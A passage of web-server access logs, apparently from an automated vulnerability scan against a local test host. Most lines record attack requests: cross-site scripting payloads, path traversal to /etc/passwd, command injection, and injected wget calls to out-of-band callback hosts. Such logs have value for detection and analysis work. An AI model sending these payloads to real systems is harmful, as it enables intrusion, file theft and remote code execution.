"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29N5EgXkaZ2qKQ4SnjvrszclYli.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5Etdc4w3BiUfJD7mTFTKCg5j?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://ca2tuc8smpv1g2s80ca0kzbquwnianiya.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://ca2tuc8smpv1g2s80ca0n3hf9h1rokqna.oast.pro`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", 